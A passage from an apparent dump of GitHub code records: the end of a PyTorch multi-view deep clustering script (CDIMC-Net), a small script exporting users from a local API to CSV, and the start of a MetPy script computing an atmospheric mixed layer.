= F.relu(self.enc0_2(enc0_h1))\r\n enc0_h3 = F.relu(self.enc0_3(enc0_h2))\r\n z0 = self.z0_layer(enc0_h3) \r\n # encoder1\r\n enc1_h1 = F.relu(self.enc1_1(x1))\r\n enc1_h2 = F.relu(self.enc1_2(enc1_h1))\r\n enc1_h3 = F.relu(self.enc1_3(enc1_h2))\r\n z1 = self.z1_layer(enc1_h3) \r\n # encoder2\r\n enc2_h1 = F.relu(self.enc2_1(x2))\r\n enc2_h2 = F.relu(self.enc2_2(enc2_h1))\r\n enc2_h3 = F.relu(self.enc2_3(enc2_h2))\r\n z2 = self.z2_layer(enc2_h3) \r\n # encoder3\r\n enc3_h1 = F.relu(self.enc3_1(x3))\r\n enc3_h2 = F.relu(self.enc3_2(enc3_h1))\r\n enc3_h3 = F.relu(self.enc3_3(enc3_h2)) \r\n z3 = self.z3_layer(enc3_h3) \r\n # encoder4\r\n enc4_h1 = F.relu(self.enc4_1(x4))\r\n enc4_h2 = F.relu(self.enc4_2(enc4_h1))\r\n enc4_h3 = F.relu(self.enc4_3(enc4_h2)) \r\n z4 = self.z4_layer(enc4_h3) \r\n \r\n summ = torch.diag(we[:,0]).mm(z0)+torch.diag(we[:,1]).mm(z1)+torch.diag(we[:,2]).mm(z2)+torch.diag(we[:,3]).mm(z3)+torch.diag(we[:,4]).mm(z4) \r\n wei = 1/torch.sum(we,1)\r\n z = torch.diag(wei).mm(summ)\r\n \r\n # decoder0\r\n r0 = F.relu(self.dec0_0(z))\r\n dec0_h1 = F.relu(self.dec0_1(r0))\r\n dec0_h2 = F.relu(self.dec0_2(dec0_h1))\r\n dec0_h3 = F.relu(self.dec0_3(dec0_h2))\r\n x0_bar = self.x0_bar_layer(dec0_h3)\r\n # decoder1\r\n r1 = F.relu(self.dec1_0(z)) \r\n dec1_h1 = F.relu(self.dec1_1(r1))\r\n dec1_h2 = F.relu(self.dec1_2(dec1_h1))\r\n dec1_h3 = F.relu(self.dec1_3(dec1_h2))\r\n x1_bar = self.x1_bar_layer(dec1_h3)\r\n # decoder2\r\n r2 = F.relu(self.dec2_0(z))\r\n dec2_h1 = F.relu(self.dec2_1(r2))\r\n dec2_h2 = F.relu(self.dec2_2(dec2_h1))\r\n dec2_h3 = F.relu(self.dec2_3(dec2_h2))\r\n x2_bar = self.x2_bar_layer(dec2_h3) \r\n # decoder3\r\n r3 = F.relu(self.dec3_0(z))\r\n dec3_h1 = F.relu(self.dec3_1(r3))\r\n dec3_h2 = F.relu(self.dec3_2(dec3_h1))\r\n dec3_h3 = F.relu(self.dec3_3(dec3_h2))\r\n x3_bar = self.x3_bar_layer(dec3_h3) \r\n # decoder4\r\n r4 = F.relu(self.dec4_0(z))\r\n dec4_h1 = F.relu(self.dec4_1(r4))\r\n dec4_h2 = F.relu(self.dec4_2(dec4_h1))\r\n dec4_h3 = F.relu(self.dec4_3(dec4_h2))\r\n x4_bar = self.x4_bar_layer(dec4_h3) \r\n \r\n return x0_bar,x1_bar,x2_bar,x3_bar,x4_bar,z,z0,z1,z2,z3,z4\r\n\r\n\r\nclass IDEC(nn.Module):\r\n\r\n def __init__(self,\r\n n_stacks,\r\n n_input,\r\n n_z,\r\n n_clusters,\r\n pretrain_path='data/ae_handwritten-5view.pkl'):\r\n super(IDEC, self).__init__()\r\n self.pretrain_path = pretrain_path\r\n\r\n self.ae = AE(\r\n n_stacks=n_stacks,\r\n n_input=n_input,\r\n n_z=n_z)\r\n\r\n def pretrain(self, path=''):\r\n if args.pretrain_flag == 0:\r\n pretrain_ae(self.ae)\r\n print('pretrained ae finished')\r\n args.pretrain_flag = 1\r\n else:\r\n self.ae.load_state_dict(torch.load(self.pretrain_path))\r\n print('load pretrained ae model from',self.pretrain_path) \r\n \r\n def update_label(self,x0,x1,x2,x3,x4,we,cluster_layer):\r\n _,_,_,_,_, z,_,_,_,_,_ = self.ae(x0,x1,x2,x3,x4,we)\r\n # kmeans cluster \r\n x_norm = torch.reshape(torch.sum(torch.pow(z,2), 1), [-1, 1]) # column vector\r\n center_norm = torch.reshape(torch.sum(torch.pow(cluster_layer,2), 1), [1, -1]) # row vector\r\n dists = x_norm - 2 * torch.mm(z, torch.t(cluster_layer.type_as(z))) + center_norm.type_as(z) # |x-y|^2 = |x|^2 -2*x*y^T + |y|^2\r\n labels = torch.argmin(dists, 1)\r\n losses = torch.min(dists, 1)\r\n return labels, losses.values\r\n def forward(self,x0,x1,x2,x3,x4,we,ypred,cluster_layer,sp_weight_sub):\r\n _,_,_,_,_, z,vz0,vz1,vz2,vz3,vz4 = self.ae(x0,x1,x2,x3,x4,we) \r\n klloss = torch.mean(torch.diag(sp_weight_sub).mm(torch.pow(z-cluster_layer[ypred.cpu().numpy().tolist()].type_as(z),2)))\r\n klloss = klloss*len(sp_weight_sub)/sum(sp_weight_sub)\r\n return z,klloss,vz0,vz1,vz2,vz3,vz4\r\n\r\n\r\ndef pretrain_ae(model):\r\n '''\r\n pretrain autoencoder\r\n '''\r\n print(model)\r\n for m in model.modules():\r\n if isinstance(m, nn.Linear):\r\n nn.init.xavier_uniform_(m.weight)\r\n nn.init.constant_(m.bias, 0.0) \r\n\r\n optimizer = SGD(model.parameters(), lr=args.lrae, momentum=args.momentumae)\r\n# model.train()\r\n index_array = np.arange(X0.shape[0])\r\n if args.AE_shuffle==True:\r\n np.random.shuffle(index_array)\r\n for epoch in range(args.aeproches): \r\n total_loss = 0.\r\n for batch_idx in range(np.int(np.ceil(X0.shape[0]/args.batch_size))):\r\n idx = index_array[batch_idx * args.batch_size: min((batch_idx+1) * args.batch_size, X0.shape[0])] \r\n x0 = X0[idx].to(device)\r\n x1 = X1[idx].to(device)\r\n x2 = X2[idx].to(device)\r\n x3 = X3[idx].to(device)\r\n x4 = X4[idx].to(device)\r\n we = WE[idx].to(device)\r\n affi_graph0 = torch.Tensor(np.copy(pre_affi_graph0[idx,:][:,idx])).to(device) \r\n affi_graph1 = torch.Tensor(np.copy(pre_affi_graph1[idx,:][:,idx])).to(device) \r\n affi_graph2 = torch.Tensor(np.copy(pre_affi_graph2[idx,:][:,idx])).to(device) \r\n affi_graph3 = torch.Tensor(np.copy(pre_affi_graph3[idx,:][:,idx])).to(device)\r\n affi_graph4 = torch.Tensor(np.copy(pre_affi_graph4[idx,:][:,idx])).to(device)\r\n \r\n affi_graph0 = 0.5*(affi_graph0+affi_graph0.t())\r\n Lap_graph0 = torch.diag(affi_graph0.sum(1))-affi_graph0\r\n affi_graph1 = 0.5*(affi_graph1+affi_graph1.t())\r\n Lap_graph1 = torch.diag(affi_graph1.sum(1))-affi_graph1 \r\n affi_graph2 = 0.5*(affi_graph2+affi_graph2.t())\r\n Lap_graph2 = torch.diag(affi_graph2.sum(1))-affi_graph2\r\n affi_graph3 = 0.5*(affi_graph3+affi_graph3.t())\r\n Lap_graph3 = torch.diag(affi_graph3.sum(1))-affi_graph3\r\n affi_graph4 = 0.5*(affi_graph4+affi_graph4.t())\r\n Lap_graph4 = torch.diag(affi_graph4.sum(1))-affi_graph4\r\n \r\n optimizer.zero_grad()\r\n x0_bar,x1_bar,x2_bar,x3_bar,x4_bar,hidden,vz0,vz1,vz2,vz3,vz4 = model(x0,x1,x2,x3,x4,we)\r\n graph_loss = (1/5)*(torch.trace(vz0.t().mm(Lap_graph0).mm(vz0))+torch.trace(vz1.t().mm(Lap_graph1).mm(vz1))+torch.trace(vz2.t().mm(Lap_graph2).mm(vz2))+torch.trace(vz3.t().mm(Lap_graph3).mm(vz3))+torch.trace(vz4.t().mm(Lap_graph4).mm(vz4)))/len(idx)\r\n loss = wmse_loss(x0_bar,x0,we[:,0])+wmse_loss(x1_bar,x1,we[:,1])+wmse_loss(x2_bar,x2,we[:,2])+wmse_loss(x3_bar,x3,we[:,3])+wmse_loss(x4_bar,x4,we[:,4])\r\n fusion_loss = loss+args.gammaae*graph_loss\r\n total_loss += fusion_loss.item()\r\n fusion_loss.backward()\r\n optimizer.step()\r\n print(\"ae_epoch {} loss={:.8f} \".format(epoch,\r\n total_loss / (batch_idx + 1)))\r\n torch.save(model.state_dict(), args.pretrain_path)\r\n print(\"model saved to {}.\".format(args.pretrain_path))\r\n\r\n\r\ndef train_idec():\r\n \r\n model = IDEC(\r\n n_stacks = 4, \r\n n_input=args.n_input,\r\n n_z = args.n_clusters,\r\n n_clusters=args.n_clusters,\r\n pretrain_path=args.pretrain_path).to(device)\r\n for m in model.modules():\r\n if isinstance(m, nn.Linear):\r\n nn.init.xavier_uniform_(m.weight)\r\n nn.init.constant_(m.bias, 0.0) \r\n \r\n model.pretrain()\r\n optimizer = Adam(model.parameters(), lr=args.lrkl)\r\n # cluster parameter initiate\r\n _,_,_,_,_,hidden,_,_,_,_,_ = model.ae(X0,X1,X2,X3,X4,WE)\r\n kmeans = KMeans(n_clusters=args.n_clusters, n_init=20)\r\n# y_pred = kmeans.fit_predict(hidden.data.cpu().numpy())\r\n hidden_np = hidden.data.cpu().numpy()\r\n hidden_np = np.nan_to_num(hidden_np)\r\n y_pred = kmeans.fit_predict(hidden_np)\r\n del hidden_np\r\n nmi_k = nmi_score(y_pred, y)\r\n print(\"nmi score={:.4f}\".format(nmi_k))\r\n\r\n hidden = None\r\n y_pred_last = np.copy(y_pred)\r\n cluster_layer = torch.tensor(kmeans.cluster_centers_).to(device)\r\n\r\n# model.train()\r\n best_acc2 = 0\r\n best_epoch = 0\r\n total_loss_KL = 0\r\n \r\n sample_weight = torch.ones(X0.shape[0])\r\n sample_weight[y_pred == -1] = 0 # do not use the noisy examples \r\n clustering_loss = 0\r\n for epoch in range(int(args.maxiter)):\r\n if epoch > 0:\r\n y_pred = y_pred.cpu().numpy()\r\n acc = cluster_acc(y, y_pred)\r\n nmi = nmi_score(y, y_pred)\r\n ari = ari_score(y, y_pred)\r\n if acc>best_acc2:\r\n best_acc2 = np.copy(acc)\r\n best_epoch = epoch\r\n print('best_Iter {}'.format(best_epoch), ':best_Acc2 {:.4f}'.format(best_acc2),'Iter {}'.format(epoch),':Acc {:.4f}'.format(acc),\r\n ', nmi {:.4f}'.format(nmi), ', ari {:.4f}'.format(ari),'total_loss_KL {:.8f}'.format(clustering_loss))\r\n\r\n # check stop criterion\r\n delta_y = np.sum(y_pred != y_pred_last).astype(np.float32) / y_pred.shape[0]\r\n y_pred_last = np.copy(y_pred)\r\n if epoch > 80 and delta_y < args.tol:\r\n print('Training stopped: epoch=%d, delta_label=%.4f, tol=%.4f' % (epoch, delta_y, args.tol))\r\n break\r\n y_pred = torch.tensor(y_pred)\r\n \"\"\" Step 1: train the network \"\"\"\r\n index_array = np.arange(X0.shape[0])\r\n if args.AE_shuffle==True:\r\n np.random.shuffle(index_array) \r\n for KL_epoach in range(args.maxKL_epoach):\r\n total_loss_KL = 0 \r\n for batch_idx in range(np.int(np.ceil(X0.shape[0]/args.batch_size))):\r\n idx = index_array[batch_idx * args.batch_size: min((batch_idx+1) * args.batch_size,X0.shape[0])] \r\n x0 = X0[idx].to(device)\r\n x1 = X1[idx].to(device)\r\n x2 = X2[idx].to(device)\r\n x3 = X3[idx].to(device)\r\n x4 = X4[idx].to(device)\r\n we = WE[idx].to(device)\r\n y_pred_sub = y_pred[idx].to(device)\r\n sample_weight_sub = sample_weight[idx].to(device)\r\n affi_graph0 = torch.Tensor(np.copy(pre_affi_graph0[idx,:][:,idx])).to(device) \r\n affi_graph1 = torch.Tensor(np.copy(pre_affi_graph1[idx,:][:,idx])).to(device) \r\n affi_graph2 = torch.Tensor(np.copy(pre_affi_graph2[idx,:][:,idx])).to(device) \r\n affi_graph3 = torch.Tensor(np.copy(pre_affi_graph3[idx,:][:,idx])).to(device)\r\n affi_graph4 = torch.Tensor(np.copy(pre_affi_graph4[idx,:][:,idx])).to(device)\r\n affi_graph0 = 0.5*(affi_graph0+affi_graph0.t())\r\n Lap_graph0 = torch.diag(affi_graph0.sum(1))-affi_graph0\r\n affi_graph1 = 0.5*(affi_graph1+affi_graph1.t())\r\n Lap_graph1 = torch.diag(affi_graph1.sum(1))-affi_graph1 \r\n affi_graph2 = 0.5*(affi_graph2+affi_graph2.t())\r\n Lap_graph2 = torch.diag(affi_graph2.sum(1))-affi_graph2\r\n affi_graph3 = 0.5*(affi_graph3+affi_graph3.t())\r\n Lap_graph3 = torch.diag(affi_graph3.sum(1))-affi_graph3\r\n affi_graph4 = 0.5*(affi_graph4+affi_graph4.t())\r\n Lap_graph4 = torch.diag(affi_graph4.sum(1))-affi_graph4 \r\n \r\n optimizer.zero_grad()\r\n hidden,kl_loss,vz0,vz1,vz2,vz3,vz4 = model(x0,x1,x2,x3,x4,we,y_pred_sub,cluster_layer,sample_weight_sub) \r\n if np.isnan(hidden.data.cpu().numpy()).any():\r\n break \r\n graph_loss = (1/5)*(torch.trace(vz0.t().mm(Lap_graph0).mm(vz0))+torch.trace(vz1.t().mm(Lap_graph1).mm(vz1))+torch.trace(vz2.t().mm(Lap_graph2).mm(vz2))+torch.trace(vz3.t().mm(Lap_graph3).mm(vz3))+torch.trace(vz4.t().mm(Lap_graph4).mm(vz4)))/len(idx)\r\n fusion_loss = kl_loss+args.gammakl*graph_loss \r\n total_loss_KL +=fusion_loss \r\n fusion_loss.backward()\r\n optimizer.step()\r\n if np.isnan(hidden.data.cpu().numpy()).any():\r\n total_loss_KL=0\r\n break\r\n else:\r\n total_loss_KL = total_loss_KL.item() / (batch_idx + 1)\r\n \r\n \"\"\" Step 2: update labels \"\"\"\r\n y_pred, prelosses = model.update_label(X0,X1,X2,X3,X4,WE,cluster_layer) \r\n \r\n clustering_loss = torch.sum(prelosses)/len(prelosses)\r\n \"\"\" Step 3: Compute sample weights \"\"\"\r\n lam = clustering_loss + epoch*torch.std(prelosses) / args.maxiter\r\n sample_weight = torch.where(prelosses < lam, torch.full_like(prelosses,1), torch.full_like(prelosses,0))\r\n \r\n \r\n y_pred,_ = model.update_label(X0,X1,X2,X3,X4,WE,cluster_layer)\r\n y_pred = y_pred.cpu().numpy()\r\n return y_pred \r\n\r\nif __name__ == \"__main__\":\r\n\r\n parser = argparse.ArgumentParser(\r\n description='train',\r\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n \r\n parser.add_argument('--n_clusters', default=7, type=int)\r\n parser.add_argument('--batch_size', default=128, type=int)\r\n parser.add_argument('--n_z', default=10, type=int)\r\n parser.add_argument('--dataset', type=str, default='handwritten-5view')\r\n parser.add_argument('--basis_pretrain_path', type=str, default='data/handwritten-5view')\r\n parser.add_argument('--percentDel', type=int, default=3)\r\n parser.add_argument('--AE_shuffle', type=bool, default=False) \r\n parser.add_argument('--tol', default=1e-7, type=float)\r\n parser.add_argument('--basis_save_dir', type=str, default='data/handwritten-5view')\r\n acc_ite = np.zeros(5)\r\n nmi_ite = np.zeros(5)\r\n ari_ite = np.zeros(5)\r\n pur_ite = np.zeros(5)\r\n pre_ite = np.zeros(5)\r\n rec_ite = np.zeros(5)\r\n Fscore_ite = np.zeros(5)\r\n args = parser.parse_args()\r\n\r\n\r\n ff = 2\r\n args.save_dir = args.basis_save_dir+'_0_'+str(args.percentDel)+'_ff_'+str(ff)\r\n best_acc = 0\r\n best_nmi = 0\r\n \r\n args.cuda = torch.cuda.is_available()\r\n print(\"use cuda: {}\".format(args.cuda))\r\n device = torch.device(\"cuda\" if args.cuda else \"cpu\") \r\n data = scipy.io.loadmat('data/'+args.dataset+'.mat')\r\n foldss = scipy.io.loadmat('data/'+args.dataset+'_percentDel_0.'+str(args.percentDel)+'.mat') \r\n label = data['Y']\r\n label = label.reshape(-1)\r\n label = np.array(label,'float64')\r\n X = data['X']\r\n args.n_clusters = len(np.unique(label))\r\n y = label\r\n del label,data\r\n folds = foldss['folds']\r\n WE = folds[0,ff]\r\n del folds\r\n \r\n X0 = np.array(X[0,0],'float64') #240 76 216 47 64 features~\r\n X1 = np.array(X[0,1],'float64')\r\n X2 = np.array(X[0,2],'float64')\r\n X3 = np.array(X[0,3],'float64')\r\n X4 = np.array(X[0,4],'float64') \r\n del X\r\n \r\n iv = 0\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n linshi_XN0 = np.copy(X0) \r\n linshi_XN0[ind_0,:] = np.mean(linshi_XN0[ind_1,:],axis=0)\r\n linshi_XN0 = normalize(linshi_XN0) \r\n X0[ind_1,:] = StandardScaler().fit_transform(X0[ind_1,:])\r\n X0[ind_0,:] = 0\r\n \r\n iv = 1\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n linshi_XN1 = np.copy(X1) \r\n linshi_XN1[ind_0,:] = np.mean(linshi_XN1[ind_1,:],axis=0)\r\n linshi_XN1 = normalize(linshi_XN1) \r\n X1[ind_1,:] = StandardScaler().fit_transform(X1[ind_1,:])\r\n X1[ind_0,:] = 0\r\n \r\n iv=2\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n linshi_XN2 = np.copy(X2) \r\n linshi_XN2[ind_0,:] = np.mean(linshi_XN2[ind_1,:],axis=0)\r\n linshi_XN2 = normalize(linshi_XN2) \r\n X2[ind_1,:] = StandardScaler().fit_transform(X2[ind_1,:])\r\n X2[ind_0,:] = 0\r\n \r\n iv=3\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1) \r\n linshi_XN3 = np.copy(X3) \r\n linshi_XN3[ind_0,:] = np.mean(linshi_XN3[ind_1,:],axis=0)\r\n linshi_XN3 = normalize(linshi_XN3) \r\n X3[ind_1,:] = StandardScaler().fit_transform(X3[ind_1,:])\r\n X3[ind_0,:] = 0\r\n \r\n iv=4\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1) \r\n linshi_XN4 = np.copy(X4) \r\n linshi_XN4[ind_0,:] = np.mean(linshi_XN4[ind_1,:],axis=0)\r\n linshi_XN4 = normalize(linshi_XN4) \r\n X4[ind_1,:] = StandardScaler().fit_transform(X4[ind_1,:])\r\n X4[ind_0,:] = 0 \r\n del iv,ind_1,ind_0,WEiv\r\n \r\n X0 = np.nan_to_num(X0)\r\n X1 = np.nan_to_num(X1)\r\n X2 = np.nan_to_num(X2)\r\n X3 = np.nan_to_num(X3)\r\n X4 = np.nan_to_num(X4)\r\n \r\n X_total = np.concatenate((linshi_XN0,linshi_XN1,linshi_XN2,linshi_XN3,linshi_XN4),axis=1)\r\n np.random.seed(20)\r\n kmeans = KMeans(n_clusters=args.n_clusters, n_init=20,random_state=20)\r\n \r\n\r\n# kmeans = KMeans(n_clusters=args.n_clusters, n_init=20)\r\n y_pred = kmeans.fit_predict(X_total) \r\n del X_total,kmeans\r\n \r\n \r\n X0_train = np.zeros(X0.shape)\r\n X1_train = np.zeros(X1.shape)\r\n X2_train = np.zeros(X2.shape)\r\n X3_train = np.zeros(X3.shape)\r\n X4_train = np.zeros(X4.shape)\r\n\r\n \r\n linshi_XN0_train = np.zeros(X0.shape)\r\n linshi_XN1_train = np.zeros(X1.shape)\r\n linshi_XN2_train = np.zeros(X2.shape)\r\n linshi_XN3_train = np.zeros(X3.shape)\r\n linshi_XN4_train = np.zeros(X4.shape)\r\n\r\n \r\n label_train = np.zeros(y.shape)\r\n WE_train = np.zeros(WE.shape)\r\n basis_index = 0\r\n for li in range(args.n_clusters):\r\n index_li = np.where(y_pred==li)\r\n index_li = (np.array(index_li)).reshape(-1)\r\n X0_train[np.arange(len(index_li))+basis_index,:] = np.copy(X0[index_li])\r\n X1_train[np.arange(len(index_li))+basis_index,:] = np.copy(X1[index_li])\r\n X2_train[np.arange(len(index_li))+basis_index,:] = np.copy(X2[index_li])\r\n X3_train[np.arange(len(index_li))+basis_index,:] = np.copy(X3[index_li])\r\n X4_train[np.arange(len(index_li))+basis_index,:] = np.copy(X4[index_li])\r\n \r\n label_train[np.arange(len(index_li))+basis_index] = np.copy(y[index_li])\r\n WE_train[np.arange(len(index_li))+basis_index,:] = np.copy(WE[index_li,:])\r\n linshi_XN0_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN0[index_li])\r\n linshi_XN1_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN1[index_li])\r\n linshi_XN2_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN2[index_li])\r\n linshi_XN3_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN3[index_li])\r\n linshi_XN4_train[np.arange(len(index_li))+basis_index,:] = np.copy(linshi_XN4[index_li])\r\n basis_index = basis_index + len(index_li)\r\n \r\n del X0,X1,X2,X3,X4,WE,y,linshi_XN0,linshi_XN1,linshi_XN2,linshi_XN3,linshi_XN4\r\n X0 = np.copy(X0_train)\r\n X1 = np.copy(X1_train)\r\n X2 = np.copy(X2_train)\r\n X3 = np.copy(X3_train)\r\n X4 = np.copy(X4_train)\r\n \r\n WE = np.copy(WE_train)\r\n y = label_train\r\n del X0_train,X1_train,X2_train,X3_train,X4_train,WE_train,label_train,basis_index,index_li \r\n \r\n \r\n iv = 0\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN0_train[ind_1,:]) \r\n pre_affi_graph0 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph0 = np.matmul(np.matmul(index_matrix,pre_affi_graph0),np.transpose(index_matrix))\r\n\r\n iv = 1\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN1_train[ind_1,:]) \r\n pre_affi_graph1 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph1 = np.matmul(np.matmul(index_matrix,pre_affi_graph1),np.transpose(index_matrix))\r\n \r\n iv=2\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN2_train[ind_1,:]) \r\n pre_affi_graph2 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph2 = np.matmul(np.matmul(index_matrix,pre_affi_graph2),np.transpose(index_matrix)) \r\n\r\n iv = 3\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN3_train[ind_1,:]) \r\n pre_affi_graph3 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph3 = np.matmul(np.matmul(index_matrix,pre_affi_graph3),np.transpose(index_matrix)) \r\n\r\n iv = 4\r\n WEiv = np.copy(WE[:,iv])\r\n ind_1 = np.where(WEiv==1)\r\n ind_1 = (np.array(ind_1)).reshape(-1)\r\n X_kc = np.copy(linshi_XN4_train[ind_1,:]) \r\n pre_affi_graph4 = get_kNNgraph2(X_kc,K_num=11) \r\n ind_0 = np.where(WEiv==0)\r\n ind_0 = (np.array(ind_0)).reshape(-1)\r\n index_matrix = np.diag(WEiv)\r\n index_matrix = np.delete(index_matrix,ind_0,axis=1) #n*nv\r\n pre_affi_graph4 = np.matmul(np.matmul(index_matrix,pre_affi_graph4),np.transpose(index_matrix)) \r\n \r\n del ind_1,ind_0,X_kc,index_matrix,linshi_XN0_train,linshi_XN1_train,linshi_XN2_train,linshi_XN3_train,linshi_XN4_train\r\n \r\n X0 = torch.Tensor(X0).to(device)\r\n X1 = torch.Tensor(X1).to(device)\r\n X2 = torch.Tensor(X2).to(device)\r\n X3 = torch.Tensor(X3).to(device)\r\n X4 = torch.Tensor(X4).to(device)\r\n WE = torch.Tensor(WE).to(device)\r\n \r\n args.n_input = [X0.shape[1],X1.shape[1],X2.shape[1],X3.shape[1],X4.shape[1]]\r\n \r\n args.lrae = 0.01\r\n args.momentumae = 0.95\r\n args.gammaae = 0.001\r\n args.lrkl = 0.0001\r\n args.gammakl = 0.001\r\n args.maxKL_epoach = 7 \r\n args.maxiter = 100\r\n args.aeproches = 500 \r\n args.pretrain_flag = 1\r\n args.pretrain_path = args.basis_pretrain_path+'_'+str(ff)+'_0.'+str(args.percentDel)+'_aelr_'+str(args.lrae)+'_aeproches_'+str(args.aeproches)+'_pretrained_model'+'.pkl'\r\n\r\n# args.pretrain_flag = 0\r\n# args.pretrain_path = args.basis_pretrain_path+'_'+str(ff)+'_aelr_'+str(args.lrae)+'_aeproches_'+str(args.aeproches)+'.pkl'\r\n # SGD parameter\r\n\r\n print(args)\r\n y_pred = train_idec()\r\n \r\n acc_ite_lin = cluster_acc(y, y_pred)*100\r\n nmi_ite_lin = nmi_score(y, y_pred)*100\r\n pur_ite_lin = idecutils.purity_score(y,y_pred)*100\r\n\r\n \r\n \r\n\r\n","repo_name":"DarrenZZhang/CDIMC-Net","sub_path":"CDIMC-net-handwritten_final.py","file_name":"CDIMC-net-handwritten_final.py","file_ext":"py","file_size_in_byte":30510,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"30643332356","text":"#Export data from API to csv file\nimport csv \nimport json \nimport requests\nimport sys\n\nif len(sys.argv) != 2:\n print(\"Usage: .\\import.py destination.csv\")\n sys.exit(2)\n \ndestination = sys.argv[1]\n\nAPI_ENDPOINT = \"http://127.0.0.1:5000/api/users\"\n\n#Get all users\nr = requests.get(url = API_ENDPOINT)\njson_data = r.json()\n\nusers_data = json_data[\"users\"]\n\ndata_file = open(destination, 'w', newline='')\ncsv_writer = csv.writer(data_file)\n\n#Counter for header\ncount = 0\n \nfor user in users_data:\n\n #Remove ids\n if 'id' in user:\n del user['id']\n\n #Add header\n if count == 0:\n header = user.keys()\n csv_writer.writerow(header)\n count += 1\n \n #Add user data to csv\n csv_writer.writerow(user.values())\n \ndata_file.close()","repo_name":"utc99/apiv1","sub_path":"bulkdata/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29546358427","text":"from datetime import datetime\n\nimport matplotlib.pyplot as plt\n\nimport metpy.calc as mpcalc\nfrom metpy.io import get_upper_air_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\nimport numpy as np\nfrom metpy.constants import kappa\nget_ipython().magic('matplotlib inline')\n\n# Download and parse the data\ndataset = get_upper_air_data(datetime(1999, 5, 4, 0), 'OUN', retry_delay=1000)\n\np = dataset.variables['pressure'][:]\nT = dataset.variables['temperature'][:]\nTd = dataset.variables['dewpoint'][:]\nu = dataset.variables['u_wind'][:]\nv = dataset.variables['v_wind'][:]\n\ndef mixed_layer(p, T, Td, depth=100*units.hPa, starting_pressure=p[0]):\n \n bottom_pressure = p[0]\n top_pressure = p[0] - depth\n \n inds = (p <= bottom_pressure) & (p >= top_pressure)\n p_interp = p[inds]\n print(p_interp)\n p_interp = np.sort(np.append(p_interp, top_pressure)) * units.hPa\n sort_args = np.argsort(p)\n T = np.interp(p_interp, p[sort_args], T[sort_args]) * units.degC\n Td = np.interp(p_interp, p[sort_args], Td[sort_args]) * units.degC\n p = p_interp\n \n theta = mpcalc.potential_temperature(p, T)\n \n mixing_ratio = mpcalc.saturation_mixing_ratio(p, Td)\n plt.plot(p, theta)\n \n actual_depth = p[-1] - p[0]\n theta_mean = (1./actual_depth.m) * np.trapz(theta, p) * units.kelvin\n mixing_ratio_mean = (1./actual_depth.m) * np.trapz(mixing_ratio, p)\n vapor_pressure_mean = mpcalc.vapor_pressure(starting_pressure, mixing_ratio_mean)\n \n dewpoint_mean = mpcalc.dewpoint(vapor_pressure_mean)\n temperature_mean = theta_mean / mpcalc.potential_temperature(starting_pressure, 1*units.degK).m\n return starting_pressure, temperature_mean.to('degC'), dewpoint_mean\n\nprint(mixed_layer(p, T, Td))\n\nmpcalc.virtual_temperature(1 * units.degC, 0.01229)\n\nmpcalc.potential_temperature(959*units.hPa, 20 * units.degC)\n\n\n\nmpcalc.potential_temperature(959*units.hPa, 275*units.degK)\n\n278.30809 /( (1000 / 959)**kappa)\n\n278.30809/ mpcalc.potential_temperature(959*units.hPa, 